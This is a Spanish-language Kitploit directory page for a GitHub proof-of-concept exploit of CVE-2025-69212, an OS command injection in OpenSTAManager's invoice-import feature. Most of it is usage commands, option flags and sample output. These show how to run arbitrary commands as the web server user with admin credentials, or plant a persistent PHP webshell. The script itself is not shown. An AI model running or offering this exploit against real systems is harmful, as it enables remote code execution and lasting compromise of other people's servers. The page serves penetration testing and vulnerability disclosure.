Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-69212-PoC — CVE-2025-69212 - OpenSTAManager Inyección de comandos del SO PoC | Kitploit
Herramientas/GitHubGitHub/alaeddine03/cve-2025-69212-poc
Generación de PayloadsExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y Control
GitHubalaeddine03/cve-2025-69212-poc

CVE-2025-69212-PoC

CVE-2025-69212 - OpenSTAManager Inyección de comandos del SO PoC

Ver Repositorio
48hace 2 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-69212 - PoC de Inyección de Comandos del SO en OpenSTAManager

Uso

Instala las dependencias:

root@kitploit:~
pip install -r requirements.txt

Ejecuta un comando único y muestra su salida:

root@kitploit:~
python3 cve-2025-69212_poc.py -u http://target.com -U admin -P 'password' -c 'id'

En su lugar, despliega una webshell persistente en PHP:

root@kitploit:~
python3 cve-2025-69212_poc.py -u http://target.com -U admin -P 'password' --shell

Opciones

FlagDescripción
-u, --urlURL base de la instancia objetivo
-U, --usernameNombre de usuario para la autenticación
-P, --passwordContraseña para la autenticación
-c, --commandComando a ejecutar, la salida se guarda en pwn_out.txt
--shellDespliega una webshell PHP en files/shell.php en lugar de ejecutar un solo comando
--id-moduleID del módulo para la función de importación de facturas (por defecto: 14)
--id-pluginID del plugin para la función de importación de facturas (por defecto: 48)

id_module e id_plugin son específicos de la instancia. Si los valores predeterminados no funcionan, inicia sesión en la interfaz web del objetivo, navega hasta la función de importación de facturas electrónicas y verifica los parámetros de la solicitud en la pestaña de red de tu navegador.

Ejemplo de Salida

root@kitploit:~
$ python3 cve-2025-69212_poc.py -u http://target.com -U admin -P 'password' -c 'id'
[*] Logging in as admin ...
[+] Authenticated.
[*] Building payload to run: id
[*] Uploading exploit ZIP to id_module=14 id_plugin=48 ...
[*] Server responded: HTTP 500 (500 after command execution is expected)
[*] Fetching command output from http://target.com/files/pwn_out.txt ...
[+] Command output:
--------------------------------------------------
uid=33(www-data) gid=33(www-data) groups=33(www-data)
--------------------------------------------------
Descargar herramienta